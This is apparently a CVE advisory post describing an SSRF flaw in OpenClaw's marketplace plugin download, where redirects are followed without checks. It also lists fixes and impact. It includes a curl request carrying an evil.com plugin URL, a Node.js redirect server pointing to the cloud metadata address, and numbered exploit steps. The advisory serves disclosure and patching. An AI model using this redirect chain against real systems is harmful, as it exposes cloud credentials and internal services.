OpenClaw, SSRF, CVE-2026-XXXXX (Medium)

Listen to this Post

The vulnerability exists in the marketplace plugin download routine defined in src/plugins/marketplace.ts. The function fetches a plugin archive from a user-influenced or attacker-controlled URL using the native `fetch()` API with default redirect-following behavior. The HTTP client automatically follows `3xx` redirect responses without re‑applying any security controls to the newly resolved location. Because no Server‑Side Request Forgery (SSRF) protection is enforced on the final URL, an attacker who can supply a malicious download endpoint can chain an HTTP redirect from a seemingly harmless, allow‑listed domain to an internal or metadata endpoint. For example, an attacker could provide a URL that initially points to a benign CDN but returns a `302` redirect to `http://169.254.169.254/latest/meta-data/`. The vulnerable code then transparently fetches the internal resource. The attack bypasses any allowlist that was only checked on the initial URL. This leads to unauthorized access to cloud instance metadata, internal services, or other private network resources. The issue was fixed by modifying the download logic to use a custom HTTP client that either disables redirects entirely or validates each redirect target against the configured SSRF policy before proceeding.

dailycve form:

Platform: OpenClaw
Version: <=2026.3.28 Vulnerability : SSRF Severity: Medium date: 2026-03-31

Prediction: 2026-03-31

What Undercode Say:

Check if a running OpenClaw instance is vulnerable
curl -X POST http://target:3000/marketplace/download \
-H "Content-Type: application/json" \
-d '{"plugin_url": "http://evil.com/redirect-to-metadata"}'
// Example of a redirect server used in the exploit
const http = require('http');
http.createServer((req, res) => {
res.writeHead(302, { Location: 'http://169.254.169.254/latest/meta-data/' });
res.end();
}).listen(80);

Exploit:

1. Host a malicious HTTP server that returns a `302 Found` redirect to an internal endpoint (e.g., cloud metadata service or internal API).
2. Convince the OpenClaw gateway to fetch a plugin archive from the attacker‑controlled URL (e.g., via a crafted marketplace entry or a direct API call).
3. The vulnerable `fetch()` follows the redirect and returns the internal response to the attacker (if the response is reflected) or enables further internal reconnaissance.

Protection from this CVE:

  • Upgrade to OpenClaw version 2026.3.31 or later.
  • If upgrading is not immediately possible, apply the patch from commit `2ce44ca6a1302b166a128abbd78f72114f2f4f52` manually.
  • As a temporary workaround, disable automatic redirect following in the HTTP client used for marketplace downloads (e.g., by setting `redirect: ‘manual’` in the fetch options).
  • Enforce a strict SSRF policy that validates every resolved URL against an allowlist before each request.

Impact:

An attacker can abuse the vulnerable plugin download flow to make the OpenClaw gateway send requests to arbitrary internal or cloud‑metadata endpoints. This can lead to the disclosure of sensitive internal information (e.g., cloud credentials, configuration secrets) and may serve as a stepping stone for further attacks against the internal network.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top